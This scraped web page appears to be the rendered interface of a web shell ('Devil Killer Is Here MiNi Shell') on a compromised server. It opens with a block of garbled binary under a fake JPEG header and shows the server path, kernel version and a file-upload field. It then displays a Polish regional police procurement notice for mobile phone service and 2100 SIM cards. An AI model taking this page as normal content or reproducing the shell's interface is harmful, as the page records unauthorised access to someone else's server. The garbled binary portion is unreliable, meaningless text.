JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220520/0017058301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi telefonii komórkowej wraz z dostawą kart SIM – 2100 szt. w tym 20 kart SIM ze stałym adresem IP na numerach abonenckich dla potrzeb jednostek Policji garnizonu mazowieckiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji z siedzibą w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670897379</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 37/59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">477013103</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">477012002</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.kwp@ra.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.mazowiecka.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi telefonii komórkowej wraz z dostawą kart SIM – 2100 szt. w tym 20 kart SIM ze stałym adresem IP na numerach abonenckich dla potrzeb jednostek Policji garnizonu mazowieckiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0cd35f3f-d68b-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00170583</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00151340/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Świadczenie usług telefonii komórkowej wraz z dostawą kart SIM - 2100 szt. w tym 20 kart SIM ze stałym adresem IP na numerach abonenckich dla potrzeb jednostek Policji garnizonu mazowieckiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/kwp_radom.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną<br/>przy użyciu platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/kwp_radom (inna niż oferta wykonawcy i załączniki<br/>do oferty) za pośrednictwem dedykowanego formularza poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po<br/>którym pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia z BZP a dodatkowo numerem wewnętrznym postępowania.<br/>4. Wykonawca ma dostęp do formularza „Wyślij wiadomość do zamawiającego” dostępny na stronie dotyczącej danego<br/>postępowania.<br/>5. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania<br/>i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/pn/kwp_radom do konkretnego Wykonawcy.<br/>6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>https://platformazakupowa.pl/pn/kwp_radom przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub<br/>powiadomienie może trafić do folderu SPAM.<br/>7. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przy użyciu środków komunikacji<br/>elektronicznej, określają „REGULAMIN platformazakupowa.pl”, który znajduje się na stronie głównej Platformy oraz „Instrukcja<br/>dlaWykonawcówplatformazakupowa.pl” dostępna jest pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>8. Maksymalny rozmiar jednego pliku przesyłanego za pomocą dedykowanego formularza przy komunikacji to maksymalnie 500 MB.<br/>9. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>e-mail: piotr.zarebski@ra.policja.gov.pl, malgorzata.wojcik@ra.policja.gov.pl<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanej w SWZ.<br/>11. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz.<br/>2452), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MSWindows 7, Mac Os x 10 4, Linux, lub ich<br/>nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf,<br/>f) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szanowna Pani/Szanowny Panie,<br/>w związku z wejściem w życie: rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) z dnia 27 kwietnia 2016 r. (Dz. Urz. UE. L Nr 119, str. 1), dalej „RODO”, dochowując warunków w nim zawartych informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji z siedzibą w Radomiu:<br/>- adres: ul. 11-go Listopada 37/59, 26-600 Radom<br/>2. Nadzór nad prawidłowym przetwarzaniem danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu sprawuje inspektor ochrony danych:<br/>Sylwia Fila<br/>- adres: ul. 11-go Listopada 37/59, 26-600 Radom <br/>- e-mail: iod.kwp@ra.policja.gov.pl<br/>3. Cel i okres przetwarzania danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu. W KWP z siedzibą w Radomiu dane osobowe przetwarza się wyłącznie w konkretnych, wyraźnych i prawnie uzasadnionych celach i nie przetwarza się ich dalej w sposób niezgodny z tymi celami. Przetwarzanie danych jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze (art. 6 ust.1 lit. c RODO) zgodnie z:<br/>Ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych – dalej zwaną ustawą Pzp,<br/>Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, <br/>Dyrektywą Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylająca dyrektywę 2004/18/WE <br/>Okres przetwarzania danych osobowych wynika bezpośrednio z przepisów prawa i jest adekwatny do celów.<br/>4. Odbiorcy danych osobowych.<br/>W rozumieniu RODO odbiorcami danych osobowych nie są organy publiczne, które mogą otrzymywać dane osobowe w ramach konkretnego postępowania zgodnie z prawem Unii lub prawem państwa członkowskiego. Dane osobowe nie są udostępniane podmiotom innym niż uprawnione na podstawie przepisów prawa. Dane będą udostępniane uprawnionym podmiotom jedynie w celu umożliwienia korzystania ze środków ochrony prawnej oraz tylko do upływu terminu na ich wniesienie.<br/>5. Osobom, których dane są przetwarzane zgodnie z RODO przysługuje:<br/>-prawo dostępu do własnych danych osobowych na zasadach określonych w ustawie Pzp,<br/>-prawo do żądania od administratora sprostowania, uzupełnienia danych, jednak nie może ono skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp, <br/>-prawo do ograniczenia przetwarzania własnych danych osobowych, ale to nie może ograniczać przetwarzania danych osobowych do czasu zakończenia postępowania, <br/>-prawo do wniesienia sprzeciwu wobec przetwarzania w sytuacjach przewidzianych prawem,<br/>-prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO.<br/>6. Przy przetwarzaniu danych osobowych w trybie RODO nie występuje zautomatyzowane podejmowanie decyzji o przetwarzaniu danych osobowych, w tym profilowanie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">25/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: ,, Świadczenie usługi telefonii komórkowej wraz z dostawą kart SIM – 2100 szt., w tym 20 kart SIM ze stałym adresem IP na numerach abonenckich dla potrzeb jednostek Policji garnizonu mazowieckiego ”<br/>Realizacja przedmiotu zamówienia dedykowana jest do operatorów telefonii komórkowej świadczących usługi na polskim rynku telekomunikacyjnym, którzy zasięgiem sieci obejmują minimum 91% terytorium Rzeczpospolitej Polskiej.<br/>Wykonawca zapewni dostęp do sieci ze szczególnym uwzględnieniem obszarów, gdzie znajdują się jednostki Policji podległe Komendzie Wojewódzkiej Policji z siedzibą w Radomiu. Zaoferowany sygnał musi być na poziomie umożliwiającym realizację transmisji głosu i danych w każdych warunkach. <br/>Wymagania dotyczące przedmiotu zamówienia<br/>Przedmiotem zamówienia jest świadczenie usługi telefonii komórkowej. Dla wszystkich kart SIM objętych postępowaniem Wykonawca udostępni usługi, które są ogólnodostępne w jego sieci w ofertach skierowanych do klientów „biznesowych”. <br/>Wykonawca dla 2100 sztuk kart SIM zapewni nielimitowane na terenie kraju w skali miesiąca wliczone w koszt abonamentu połączenia głosowe do wszystkich sieci telefonii komórkowych, sieci stacjonarnych, wiadomości SMS/MMS oraz nielimitowanego bezprzewodowego dostępu do sieci Internet (w ramach abonamentu) w tym 20 kart SIM ze stałym adresem IP na numerach abonenckich podanych przez Zamawiającego.<br/>Wymagany minimalny pakiet Internetu dla pojedynczego numeru 70 GB. <br/>Zamawiający po przekroczeniu zaoferowanego transferu danych dopuszcza możliwość zmiany parametrów technicznych transmisji danych (obniżenie prędkości transmisji) do poziomu minimum 10 Mb/s.<br/>Ewentualna opłata aktywacyjna/instalacyjna zostanie wliczona w koszt stałego jednostkowego abonamentu.<br/>Świadczona usługa telekomunikacyjna ma zapewnić między innymi:<br/>-transmisję głosu<br/>-przesyłanie SMS<br/>-przesyłanie MMS<br/>-dostęp do Internetu (przeglądanie stron www, poczta elektroniczna itp.)<br/>-prezentację numeru (dzwoniącego i własnego)<br/>-roaming<br/>-połączenia międzynarodowe<br/>-transmisję GPRS, EDGE, UMTS, HSDPA, LTE, 5G <br/>-połączenia oczekujące<br/>-zawieszanie połączeń<br/>-poczta głosowa.<br/>W ramach usługi Wykonawca dostarczy niezbędne do jej realizacji karty SIM w ilości 2100 sztuk<br/>w terminie do 30.06.2022r., a także zapewni bezpłatny serwis. Aktywacja dostarczonych kart SIM nastąpi w dniu rozpoczęcia świadczenia usługi tj. 24.07.2022 r. z zachowaniem ciągłości połączeń głosowych w stosunku do świadczonej usługi przez dotychczasowego operatora. Zamawiający zastrzega sobie prawo możliwości zachowania dotychczasowych numerów w przypadku przenoszenia ich do sieci nowego operatora jak również bezpłatnej blokady usług o podwyższonej opłacie typu SMS Premium, MMS Premium, serwisy rozrywkowe.<br/>Połączenia międzynarodowe oraz wykonane w roamingu będą rozliczane na warunkach ogólnych dla klientów biznesowych - zgodnie z ogólnopolskim cennikiem Wykonawcy aktualnym na dzień złożenia oferty dla klientów biznesowych, który dostarczy przed podpisaniem umowy. Zamawiający wymaga naliczania (taryfikowania) czasu połączeń głosowych co jedną sekundę (bez opłaty inicjacyjnej).<br/>Wykonawca zapewni bezpłatną usługę kontroli kosztów indywidualnie dla każdego numeru abonenckiego poprzez krajową wiadomość SMS lub nr informacyjny.<br/>Ceny pozostałych dostępnych usług podstawowych świadczonych w ramach usług telekomunikacyjnych telefonii komórkowej nie mogą być wyższe niż określone w aktualnym na dzień składania ofert cenniku dla „taryf biznesowych” Wykonawcy. <br/>Wykonawca najpóźniej w dniu podpisania umowy dostarczy aktualny Cennik usług oraz Regulamin świadczenia usług telekomunikacyjnych, które stanowić będą integralną część umowy.<br/>Wymagania dotyczące kart SIM:<br/>- Zamawiający wymaga aby dostarczone 2100 kart SIM w tym 20 karty SIM ze stałym adresem IP posiadały możliwość wprowadzenia do pamięci minimum 500 wpisów i były zabezpieczone <br/>przed uruchomieniem minimum czterocyfrowym kodem PIN z możliwością jego wyłączenia. Oferowany typ kart SIM musi mieć możliwość adaptacji do używanych przez Zamawiającego urządzeń (micro sim, nano sim, eSIM). <br/>-Karty SIM mają być dostarczone do magazynu Wydziału Łączności i Informatyki <br/>przy ul. 11 Listopada 37/59, 26-600 Radom w opakowaniach uniemożliwiających ich uszkodzenie. <br/>Na opakowaniu każdej z nich ma być widoczny nr MSISDN. <br/>-Zamawiający wymaga dostarczenia 200 szt. dodatkowych nieaktywnych kart SIM. Karty te będą aktywowane (np. w przypadku uszkodzenia, kradzieży) po telefonicznym zgłoszeniu przez Zamawiającego. Aktywacja nowej karty musi nastąpić maksymalnie po 2 godzinach roboczych od momentu zgłoszenia. W przypadku zlecenia aktywacji karty SIM w dniu ustawowo wolnym od pracy, Wykonawca zobowiązany jest do jej aktywowania do godz. 9.30 najbliższego dnia roboczego. <br/>-Wykonawca zapewni stałą miesięczną cenę abonamentu, bezpłatne przenoszenie numerów <br/>do własnej sieci oraz bezpłatną aktywację usług, jeżeli Wykonawca umożliwia korzystanie z kart eSIM to bezpłatną wymianę karty SIM na eSIM lub eSIM na SIM (minimum 4 wymian w miesiącu dla pojedynczego numeru).<br/>-Wykonawca na wniosek Zamawiającego dokona bezpłatnie cesji numeru telefonu. W takim przypadku Wykonawca uruchomi nowy numer telefonu.<br/>-W przypadku trzykrotnego, błędnego wprowadzenia kodu PIN karta powinna zostać samoczynnie zablokowana. Odblokowanie jej winno nastąpić po wprowadzeniu podanego (przy dostarczeniu kart) Zamawiającemu przez Wykonawcę kodu PUK. <br/>-Wykonawca zapewni w oferowanej cenie możliwość zablokowania oraz aktywacji kart SIM w przypadku utraty lub uszkodzenia.<br/>Wymagania dotyczące usług:<br/>Ogólne wymagania:<br/>-Zachowanie wszystkich dotychczasowych numerów abonenckich w tym 20 kart ze stałym adresem IP Zamawiającego i przeniesienie numerów do sieci Wykonawcy po wygaśnięciu umowy na świadczenie usług z dotychczasowym operatorem (ORANGE POLSKA S.A.) . Zamawiający upoważni Wykonawcę do realizacji procedury związanej z przeniesieniem numerów do sieci Wykonawcy; <br/>-Przeniesienie nr abonenckich do sieci Wykonawcy nastąpi po zakończeniu trwania obowiązującej umowy tj. w nocy z dnia 23.07.2022 r. na dzień 24.07.2022 r. z zachowaniem ciągłości połączeń głosowych w stosunku do świadczonej usługi przez dotychczasowego operatora. Zamawiający dopuszcza przerwę w świadczeniu usług na czas przenoszenia numeracji do nowego operatora w godzinach 0.00-06.00.<br/>-Wykonawca zobowiązuje się do dokonania migracji obecnie używanych numerów z sieci operatora dotychczas świadczącego usługę w kolejności podanej przez Zamawiającego (wykaz kolejności w wersji elektronicznej dostarczy Zamawiający).<br/>-Dostawa kart SIM musi nastąpić nie później niż do dnia 30.06.2022 r.<br/>-Wykonawca ponosi koszty związane z dostawą kart SIM.<br/>-Wykonawca odpowiada za uszkodzenia powstałe w czasie transportu.<br/>-Wykonawca wydzieli grupę korporacyjną dla numerów abonenckich Zamawiającego. <br/>-Wykonawca będzie zobowiązany do wystawiania osobnych faktur VAT dla każdego konta klienta <br/>ze szczegółowym billingiem przeprowadzonych połączeń (billing powinien zawierać: dzień i czas trwania połączenia, godzinę i minutę wykonania połączenia, adresata połączenia, SMSy, MMSy, <br/>ilość przesłanych/odebranych danych, cenę połączeń dla każdego numeru MSISDN).<br/>-Wykonawca zobowiązuje się do przyjmowania zgłoszeń serwisowych telefonicznie lub za pośrednictwem poczty elektronicznej, 24 godziny na dobę, 7 dni w tygodniu przez 365 lub 366 dni w roku.<br/>-Elektroniczne dane taryfikacyjne muszą być bezpłatnie udostępnione i przekazane Zamawiającemu za pomocą aplikacji internetowej w postaci pliku Excel.<br/>Wykonawca zobowiązany jest do wyznaczenia stałego opiekuna kluczowego, dyspozycyjnego przez czas trwania umowy, do bieżących kontaktów z wyznaczonymi pracownikami Zamawiającego.<br/>Wykonawca zapewni całodobową obsługę (w godzinach urzędowania opiekuna kluczowego w pełnym zakresie, a po godzinach w zakresie blokady kart SIM, uruchamiania podstawowych usług np. roaming).<br/>Zamawiający wymaga od Wykonawcy, aby w ramach wykonywania przedmiotu umowy czynności opiekuna Zamawiającego, były wykonywane przez pracowników zatrudnionych na podstawie stosunku pracy w rozumieniu przepisów art. 22 §1 Kodeksu Pracy (tj. Dz.U. z 2020 poz. 1320 z późn. zm. ).<br/>Wykonawca w ramach zaoferowanego abonamentu udostępni narzędzie do zarządzania interaktywnego wszystkimi numerami znajdującymi się na kontach Zamawiającego w zakresie konfiguracji usług i billingów elektronicznych na zasadach oferowanych klientom „biznesowym”. <br/>Powinno ono obejmować następujące funkcje:<br/>•zarządzanie usługami na kartach SIM (włączanie i wyłączanie):<br/>-roaming,<br/>-rozmowy międzynarodowe,<br/>-prezentacja numeru (dzwoniącego i własnego)<br/>-dezaktywacja na wypadek kradzieży kart SIM,<br/>•bieżące użycie usług na poszczególnych nr MSISDN,<br/>•informacji szczegółowych o numerach MSISDN: PUK, nr seryjny karty SIM, informacji o zobowiązaniach finansowych (faktury, billingi).<br/>Wykonawca w ramach zaoferowanej ceny zapewni szkolenie z obsługi dostarczonej aplikacji dla 2 (dwóch) administratorów Zamawiającego w sposób zaproponowany przez Wykonawcę.<br/>Usługi takie jak roaming i połączenia międzynarodowe mają być naliczane zgodniez ogólnopolskim cennikiem Wykonawcy aktualnym na dzień złożenia oferty dla klientów biznesowych. Zamawiający wymaga aby Wykonawca podał koszty połączeń międzynarodowych z podziałem na kraje, zgodnie z wykazem dostępnym w publicznej ofercie. Cennik połączeń międzynarodowych, roaming i na inne usługi oferowane ogólnie dla klientów biznesowych w sieci Wykonawcy zostanie dołączony do umowy.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w:<br/>a)Opisie Przedmiotu Zamówienia 